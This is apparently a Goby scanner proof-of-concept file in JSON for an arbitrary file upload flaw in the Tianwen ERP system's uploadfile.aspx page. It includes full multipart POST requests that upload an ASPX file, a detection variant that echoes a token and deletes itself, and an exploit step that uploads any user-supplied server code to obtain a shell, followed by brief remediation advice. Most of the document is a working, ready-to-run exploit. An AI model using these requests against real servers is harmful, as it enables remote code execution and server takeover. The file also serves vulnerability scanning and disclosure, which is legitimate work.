{
"Name": "Tianwen ERP system uploadfile.aspx Arbitrary file upload",
"Level": "3",
"Tags": [
"getshell"
],
"GobyQuery": "body=\"天问物业ERP系统\"",
"Description": "An arbitrary file upload vulnerability exists in /HM/M_Main/uploadfile.aspx",
"Product": "Tianwen ERP system",
"Homepage": "https://gobies.org/",
"Author": "http://www.tw369.com",
"Impact": "<p>An attacker can use this vulnerability to upload malicious files, gain control of the server, and obtain sensitive system information.<br></p>",
"Recommendation": "<p>1. Verify the uploaded file type. In addition to front-end validation, the back end should validate the file by extension checking, rename uploaded files, check the MIME type, and limit the size of uploaded files; alternatively, store uploads on a separate file storage server. </p><p>2. Strictly restrict and validate uploaded files, and reject files that contain malicious code. In addition, remove execute permission from the upload directory so that uploaded Trojan horses cannot run. </p><p>3. Strictly validate the format of uploaded files to prevent malicious script files from being uploaded. </p><p>4. Strictly restrict the path to which files are uploaded. </p><p>5. Validate the file name extension against a server-side whitelist. </p><p>6. Validate file content on the server. </p><p>7. Rename files after upload. </p>",
"References": [
"https://gobies.org/"
],
"HasExp": true,
"ExpParams": [
{
"Name": "Code",
"Type": "input",
"Value": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/HM/M_Main/uploadfile.aspx",
"follow_redirect": true,
"header": {
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarytKnDdPq6SMXufwyT"
},
"data_type": "text",
"data": "------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"__VIEWSTATE\"\n\n/wEPDwUKLTg1NDU3MTA4OQ9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk70CKfgUcso35StfmoNB/ObwwU8W4qvmgqa52HxmqsU0=\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"__VIEWSTATEGENERATOR\"\n\nDE1005D5\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"__EVENTVALIDATION\"\n\n/wEdAAIk02sIXo/TRIPUygBB64GvmW/ynBkkkA2xI95ik8Vs4GXPPWvIYnA84468jdc5Wr+nrufsSY+RKtcm7vKIotDs\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"BtnSave\"\n\n确定上传\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"upload_img\"; filename=\"1.aspx\"\nContent-Type: application/octet-stream\n\n<%@Page Language=\"C#\"%>\n<%Response.Write(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"{{{enbs4str1}}}\"))); System.IO.File.Delete(Request.PhysicalPath);%>\n\n------WebKitFormBoundarytKnDdPq6SMXufwyT\n",
"set_variable": [
"str2|rand|str|4",
"enbs4str1|define|base64|str2"
]
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "UploadCallBack",
"bz": ""
}
]
},
"SetVariable": [
"shell_url|lastbody|regex|\\('(.*)'\\)"
]
},
{
"Request": {
"method": "GET",
"uri": "{{{shell_url}}}",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "{{{str2}}}",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/HM/M_Main/uploadfile.aspx",
"follow_redirect": true,
"header": {
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarytKnDdPq6SMXufwyT"
},
"data_type": "text",
"data": "------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"__VIEWSTATE\"\n\n/wEPDwUKLTg1NDU3MTA4OQ9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk70CKfgUcso35StfmoNB/ObwwU8W4qvmgqa52HxmqsU0=\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"__VIEWSTATEGENERATOR\"\n\nDE1005D5\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"__EVENTVALIDATION\"\n\n/wEdAAIk02sIXo/TRIPUygBB64GvmW/ynBkkkA2xI95ik8Vs4GXPPWvIYnA84468jdc5Wr+nrufsSY+RKtcm7vKIotDs\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"BtnSave\"\n\n确定上传\n------WebKitFormBoundarytKnDdPq6SMXufwyT\nContent-Disposition: form-data; name=\"upload_img\"; filename=\"1.aspx\"\nContent-Type: application/octet-stream\n\n{{{Code}}}\n\n------WebKitFormBoundarytKnDdPq6SMXufwyT\n",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|\\('(.*)'\\)"
]
}
],
"PostTime": "2021-10-25 17:37:43",
"GobyVersion": "1.9.304"
}